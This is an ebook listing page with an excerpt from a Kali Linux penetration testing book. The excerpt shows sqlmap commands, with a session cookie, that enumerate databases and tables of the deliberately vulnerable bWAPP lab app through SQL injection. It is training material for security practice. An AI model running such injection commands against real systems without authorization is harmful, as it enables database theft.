Advanced Penetration Testing with Kali Linux by Meel Ummed;

Advanced Penetration Testing with Kali Linux by Meel Ummed;

Author:Meel, Ummed;
Language: eng
Format: epub
Publisher: BPB Publications


Figure 6.7: List of all possible SQL injection types

Analyze the target URL for SQL injection vulnerabilities and generate a list of available databases by using the command sqlmap -u <target URL> --random-agent --dbs shown in Figure 6.8:

Command: sqlmap -u http://192.168.29.25/bWAPP/sqli_1.php?title= --cookie="PHPSESSID=q8omhem3kkoi09sfnfo9ukim22;security_level=0" --random-agent –dbs

Figure 6.8: List of available databases

After obtaining the list of databases, display all tables in the selected database by running the command sqlmap -u <target URL> --random-agent -D <database name> --tables as shown in Figure 6.9:

Command: sqlmap -u http://192.168.29.25/bWAPP/sqli_1.php?title= --cookie="PHPSESSID=q8omhem3kkoi09sfnfo9ukim22;security_level=0" --random-agent –D bwapp –tables



Download



Copyright Disclaimer:
This site does not store any files on its server. We only index and link to content provided by other sites. Please contact the content providers to delete copyright contents if any and email us, we'll remove relevant links or contents immediately.